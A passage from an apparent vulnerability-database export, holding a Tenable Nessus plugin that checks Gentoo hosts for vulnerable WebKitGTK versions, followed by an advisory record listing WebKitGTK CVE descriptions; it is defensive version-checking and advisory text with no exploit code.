"CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-22677", "CVE-2022-2294", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293", "CVE-2022-30294", "CVE-2022-32784", "CVE-2022-32792", "CVE-2022-32893"], "modified": "2022-08-31T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:webkit-gtk", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202208-39.NASL", "href": "https://www.tenable.com/plugins/nessus/164535", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202208-39.\n#\n# The advisory text is Copyright (C) 2001-2021 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike\n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164535);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/31\");\n\n script_cve_id(\n \"CVE-2022-2294\",\n \"CVE-2022-22589\",\n \"CVE-2022-22590\",\n \"CVE-2022-22592\",\n \"CVE-2022-22620\",\n \"CVE-2022-22624\",\n \"CVE-2022-22628\",\n \"CVE-2022-22629\",\n \"CVE-2022-22662\",\n \"CVE-2022-22677\",\n \"CVE-2022-26700\",\n \"CVE-2022-26709\",\n \"CVE-2022-26710\",\n \"CVE-2022-26716\",\n \"CVE-2022-26717\",\n \"CVE-2022-26719\",\n \"CVE-2022-30293\",\n \"CVE-2022-30294\",\n \"CVE-2022-32784\",\n \"CVE-2022-32792\",\n \"CVE-2022-32893\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/15\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/25\");\n\n script_name(english:\"GLSA-202208-39 : WebKitGTK+: Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by the vulnerability described in GLSA-202208-39 (WebKitGTK+: Multiple Vulnerabilities)\n\n - A validation issue was addressed with improved input sanitization. This issue is fixed in iOS 15.3 and\n iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing a maliciously crafted\n mail message may lead to running arbitrary javascript. (CVE-2022-22589)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.3 and\n iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web\n content may lead to arbitrary code execution. (CVE-2022-22590)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 15.3 and iPadOS\n 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content\n may prevent Content Security Policy from being enforced. (CVE-2022-22592)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS\n Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8).\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a\n report that this issue may have been actively exploited.. (CVE-2022-22620)\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security\n Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose\n sensitive user information. (CVE-2022-22662)\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\n - In WebKitGTK through 2.36.0 (and WPE WebKit), there is a heap-based buffer overflow in\n WebCore::TextureMapperLayer::setContentsLayer in WebCore/platform/graphics/texmap/TextureMapperLayer.cpp.\n (CVE-2022-30293)\n\n - ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2022-30293. Reason: This candidate is a\n duplicate of CVE-2022-30293. Notes: All CVE users should reference CVE-2022-30293 instead of this\n candidate. All references and descriptions in this candidate have been removed to prevent accidental\n usage. (CVE-2022-30294)\n\n - An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS\n 15.6.1 and iPadOS 15.6.1, macOS Monterey 12.5.1, Safari 15.6.1. Processing maliciously crafted web content\n may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively\n exploited. (CVE-2022-32893)\n\n - A use after free issue was addressed with improved memory management. (CVE-2022-22624, CVE-2022-22628,\n CVE-2022-26709, CVE-2022-26710, CVE-2022-26717)\n\n - A buffer overflow issue was addressed with improved memory handling. (CVE-2022-22629)\n\n - A logic issue in the handling of concurrent media was addressed with improved state handling.\n (CVE-2022-22677)\n\n - A memory corruption issue was addressed with improved state management. (CVE-2022-26700, CVE-2022-26716,\n CVE-2022-26719)\n\n - The issue was addressed with improved UI handling. (CVE-2022-32784)\n\n - An out-of-bounds write issue was addressed with improved input validation. (CVE-2022-32792)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security.gentoo.org/glsa/202208-39\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.gentoo.org/show_bug.cgi?id=832990\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.gentoo.org/show_bug.cgi?id=833568\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.gentoo.org/show_bug.cgi?id=837305\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.gentoo.org/show_bug.cgi?id=839984\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.gentoo.org/show_bug.cgi?id=845252\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.gentoo.org/show_bug.cgi?id=856445\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.gentoo.org/show_bug.cgi?id=861740\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.gentoo.org/show_bug.cgi?id=864427\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.gentoo.org/show_bug.cgi?id=866494\");\n script_set_attribute(attribute:\"solution\", value:\n\"All WebKitGTK+ users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose >=net-libs/webkit-gtk-2.36.7\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30294\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:webkit-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar flag = 0;\n\nvar packages = [\n {\n 'name' : \"net-libs/webkit-gtk\",\n 'unaffected' : make_list(\"ge 2.36.7\", \"lt 2.0.0\"),\n 'vulnerable' : make_list(\"lt 2.36.7\")\n }\n];\n\nforeach package( packages ) {\n if (isnull(package['unaffected'])) package['unaffected'] = make_list();\n if (isnull(package['vulnerable'])) package['vulnerable'] = make_list();\n if (qpkg_check(package: package['name'] , unaffected: package['unaffected'], vulnerable: package['vulnerable'])) flag++;\n}\n\n# This plugin has a different number of unaffected and vulnerable versions for\n# one or more packages. To ensure proper detection, a separate line should be \n# used for each fixed/vulnerable version pair.\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : qpkg_report_get()\n );\n exit(0);\n}\nelse\n{\n qpkg_tests = list_uniq(qpkg_tests);\n var tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"WebKitGTK+\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-18T13:11:09", "description": "The version of webkitgtk4 installed on the remote host is prior to 2.38.5-3. It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2-2023-2088 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.1, iOS 14.2 and iPadOS 14.2, iCloud for Windows 11.5, Safari 14.0.1, tvOS 14.2, iTunes 12.11 for Windows. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-27918)\n\n - Clear History and Website Data did not clear the history. The issue was addressed with improved data deletion. This issue is fixed in macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave, iOS 14.3 and iPadOS 14.3, tvOS 14.3. A user may be unable to fully delete browsing history. (CVE-2020-29623)\n\n - This issue was addressed with improved iframe sandbox enforcement. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave. Maliciously crafted web content may violate iframe sandboxing policy. (CVE-2021-1765)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, tvOS 14.4, watchOS 7.3, iOS 14.4 and iPadOS 14.4, Safari 14.0.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-1788)\n\n - A type confusion issue was addressed with improved state handling. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, tvOS 14.4, watchOS 7.3, iOS 14.4 and iPadOS 14.4, Safari 14.0.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-1789)\n\n - A port redirection issue was addressed with additional port validation. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, tvOS 14.4, watchOS 7.3, iOS 14.4 and iPadOS 14.4, Safari 14.0.3. A malicious website may be able to access restricted ports on arbitrary servers. (CVE-2021-1799)\n\n - This issue was addressed with improved iframe sandbox enforcement. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, watchOS 7.3, tvOS 14.4, iOS 14.4 and iPadOS 14.4. Maliciously crafted web content may violate iframe sandboxing policy. (CVE-2021-1801)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-1817)\n\n - A memory initialization issue was addressed with improved memory handling. This issue is fixed in macOS Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. Processing maliciously crafted web content may result in the disclosure of process memory. (CVE-2021-1820)\n\n - An input validation issue was addressed with improved input validation. This issue is fixed in iTunes 12.11.3 for Windows, iCloud for Windows 12.3, macOS Big Sur 11.3, Safari 14.1, watchOS 7.4, tvOS 14.5, iOS 14.5 and iPadOS 14.5. Processing maliciously crafted web content may lead to a cross site scripting attack. (CVE-2021-1825)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in macOS Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2021-1826)\n\n - A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 14.4.1 and iPadOS 14.4.1, Safari 14.0.3 (v. 14610.4.3.1.7 and 15610.4.3.1.7), watchOS 7.3.2, macOS Big Sur 11.2.3.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-1844)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, iOS 14.4 and iPadOS 14.4. A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. (CVE-2021-1870)\n\n - A use-after-free vulnerability exists in the way certain events are processed for ImageLoader objects of Webkit WebKitGTK 2.30.4. A specially crafted web page can lead to a potential information leak and further memory corruption. In order to trigger the vulnerability, a victim must be tricked into visiting a malicious webpage. (CVE-2021-21775)\n\n - A use-after-free vulnerability exists in the way Webkit's GraphicsContext handles certain events in WebKitGTK 2.30.4. A specially crafted web page can lead to a potential information leak and further memory corruption. A victim must be tricked into visiting a malicious web page to trigger this vulnerability.\n (CVE-2021-21779)\n\n - An exploitable use-after-free vulnerability exists in WebKitGTK browser version 2.30.3 x64. A specially crafted HTML web page can cause a use-after-free condition, resulting in remote code execution. The victim needs to visit a malicious web site to trigger the vulnerability. (CVE-2021-21806)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in Safari 14.1, iOS 12.5.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5, macOS Big Sur 11.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. (CVE-2021-30661)\n\n - An integer overflow was addressed with improved input validation. This issue is fixed in iOS 14.5.1 and iPadOS 14.5.1, tvOS 14.6, iOS 12.5.3, Safari 14.1.1, macOS Big Sur 11.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30663)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in watchOS 7.4.1, iOS 14.5.1 and iPadOS 14.5.1, tvOS 14.6, iOS 12.5.3, macOS Big Sur 11.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. (CVE-2021-30665)\n\n - A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 12.5.3.\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. (CVE-2021-30666)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. A malicious application may be able to leak sensitive user information. (CVE-2021-30682)\n\n - A logic issue was addressed with improved state management. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2021-30689)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. A malicious website may be able to access restricted ports on arbitrary servers. (CVE-2021-30720)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30734, CVE-2021-30749)\n\n - Description: A cross-origin issue with iframe elements was addressed with improved tracking of security origins. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2021-30744)\n\n - A type confusion issue was addressed with improved state handling. This issue is fixed in iOS 14.7, Safari 14.1.2, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30758)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.5.4.\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. (CVE-2021-30761)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 12.5.4.\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. (CVE-2021-30762)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 14.7, Safari 14.1.2, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30795)\n\n - This issue was addressed with improved checks. This issue is fixed in iOS 14.7, Safari 14.1.2, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7. Processing maliciously crafted web content may lead to code execution.\n (CVE-2021-30797)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30799)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in Safari 15, tvOS 15, watchOS 8, iOS 15 and iPadOS 15. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30809)\n\n - A type confusion issue was addressed with improved state handling. This issue is fixed in iOS 14.8 and iPadOS 14.8, tvOS 15, iOS 15 and iPadOS 15, Safari 15, watchOS 8. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30818)\n\n - An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 14.8 and iPadOS 14.8, tvOS 15, watchOS 8, iOS 15 and iPadOS 15. Processing a maliciously crafted audio file may disclose restricted memory. (CVE-2021-30836)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 14.8 and iPadOS 14.8, Safari 15, tvOS 15, iOS 15 and iPadOS 15, watchOS 8. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30846)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 14.8 and iPadOS 14.8, Safari 15, iOS 15 and iPadOS 15. Processing maliciously crafted web content may lead to code execution. (CVE-2021-30848)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 14.8 and iPadOS 14.8, watchOS 8, Safari 15, tvOS 15, iOS 15 and iPadOS 15, iTunes 12.12 for Windows.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30849)\n\n - A memory corruption vulnerability was addressed with improved locking. This issue is fixed in Safari 15, tvOS 15, watchOS 8, iOS 15 and iPadOS 15. Processing maliciously crafted web content may lead to code execution. (CVE-2021-30851)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in macOS Monterey 12.0.1, iOS 15.1 and iPadOS 15.1, watchOS 8.1, tvOS 15.1. Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy. (CVE-2021-30887)\n\n - An information leakage issue was addressed. This issue is fixed in iOS 15.1 and iPadOS 15.1, macOS Monterey 12.0.1, iOS 14.8.1 and iPadOS 14.8.1, tvOS 15.1, watchOS 8.1. A malicious website using Content Security Policy reports may be able to leak information via redirect behavior . (CVE-2021-30888)\n\n - A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.0.1, iOS 15.1 and iPadOS 15.1, watchOS 8.1, tvOS 15.1. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30889)\n\n - A logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.0.1, iOS 15.1 and iPadOS 15.1, watchOS 8.1, tvOS 15.1. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2021-30890)\n\n - A buffer overflow issue was addressed with improved memory handling. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30934)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30936, CVE-2021-30951)\n\n - An integer overflow was addressed with improved input validation. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30952)\n\n - An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30953)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30954)\n\n - A race condition was addressed with improved state handling. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30984)\n\n - BubblewrapLauncher.cpp in WebKitGTK and WPE WebKit before 2.34.1 allows a limited sandbox bypass that allows a sandboxed process to trick host processes into thinking the sandboxed process is not confined by the sandbox, by abusing VFS syscalls that manipulate its filesystem namespace. The impact is limited to host services that create UNIX sockets that WebKit mounts inside its sandbox, and the sandboxed process remains otherwise confined. NOTE: this is similar to CVE-2021-41133. (CVE-2021-42762)\n\n - In WebKitGTK before 2.32.4, there is incorrect memory allocation in WebCore::ImageBufferCairoImageSurfaceBackend::create, leading to a segmentation violation and application crash, a different vulnerability than CVE-2021-30889. (CVE-2021-45481)\n\n - In WebKitGTK before 2.32.4, there is a use-after-free in WebCore::ContainerNode::firstChild, a different vulnerability than CVE-2021-30889. (CVE-2021-45482)\n\n - In WebKitGTK before 2.32.4, there is a use-after-free in WebCore::Frame::page, a different vulnerability than CVE-2021-30889. (CVE-2021-45483)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22590)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may prevent Content Security Policy from being enforced. (CVE-2022-22592)\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose sensitive user information. (CVE-2022-22662)\n\n - A logic issue in the handling of concurrent media was addressed with improved state handling. This issue is fixed in macOS Monterey 12.4, iOS 15.5 and iPadOS 15.5. Video self-preview in a webRTC call may be interrupted if the user answers a phone call. (CVE-2022-22677)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5, watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted web content may lead to code execution. (CVE-2022-26700)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26709)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, tvOS 15.5, watchOS 8.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26710)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26716, CVE-2022-26719)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5, watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5, iTunes 12.12.4 for Windows.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26717)\n\n - In WebKitGTK through 2.36.0 (and WPE WebKit), there is a heap-based buffer overflow in WebCore::TextureMapperLayer::setContentsLayer in WebCore/platform/graphics/texmap/TextureMapperLayer.cpp.\n (CVE-2022-30293)\n\n - An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in iOS 15.6 and iPadOS 15.6, watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, Safari 15.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-32792)\n\n - Multiple out-of-bounds write issues were addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.5, watchOS 8.7, tvOS 15.6, iOS 15.6 and iPadOS 15.6. An app may be able to disclose kernel memory. (CVE-2022-32793)\n\n - The issue was addressed with improved UI handling. This issue is fixed in watchOS 8.7, tvOS 15.6, iOS 15.6 and iPadOS 15.6, macOS Monterey 12.5. Visiting a website that frames malicious content may lead to UI spoofing. (CVE-2022-32816)\n\n - An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.7, macOS Ventura 13, iOS 16, iOS 15.7 and iPadOS 15.7, watchOS 9, macOS Monterey 12.6, tvOS 16.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-32888)\n\n - A correctness issue in the JIT was addressed with improved checks. This issue is fixed in tvOS 16.1, iOS 15.7.1 and iPadOS 15.7.1, macOS Ventura 13, watchOS 9.1, Safari 16.1, iOS 16.1 and iPadOS 16. Processing maliciously crafted web content may disclose internal states of the app. (CVE-2022-32923)\n\n - The issue was addressed with improved UI handling. This issue is fixed in tvOS 16.1, macOS Ventura 13, watchOS 9.1, Safari 16.1, iOS 16.1 and iPadOS 16. Visiting a malicious website may lead to user interface spoofing. (CVE-2022-42799)\n\n - A logic issue was addressed with improved state management. This issue is fixed in tvOS 16.1, macOS Ventura 13, watchOS 9.1, Safari 16.1, iOS 16.1 and iPadOS 16. Processing maliciously crafted web content may disclose sensitive user information. (CVE-2022-42824)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Ventura 13, iOS 16.1 and iPadOS 16, Safari 16.1. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-42826)\n\n - The issue was addressed with improved memory handling. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may result in the disclosure of process memory. (CVE-2022-42852)\n\n - A type confusion issue was addressed with improved state handling. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.1.2. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1.. (CVE-2022-42856)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-42863, CVE-2022-46699)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-42867)\n\n - A memory consumption issue was addressed with improved memory handling. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-46691)\n\n - A logic issue was addressed with improved state management. This issue is fixed in Safari 16.2, tvOS 16.2, iCloud for Windows 14.1, iOS 15.7.2 and iPadOS 15.7.2, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may bypass Same Origin Policy. (CVE-2022-46692)\n\n - A logic issue was addressed with improved checks. This issue is fixed in Safari 16.2, tvOS 16.2, iCloud for Windows 14.1, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may disclose sensitive user information. (CVE-2022-46698)\n\n - A memory corruption issue was addressed with improved input validation. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-46700)\n\n - A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2. (CVE-2023-2203)\n\n - The issue was addressed with improved memory handling. This issue is fixed 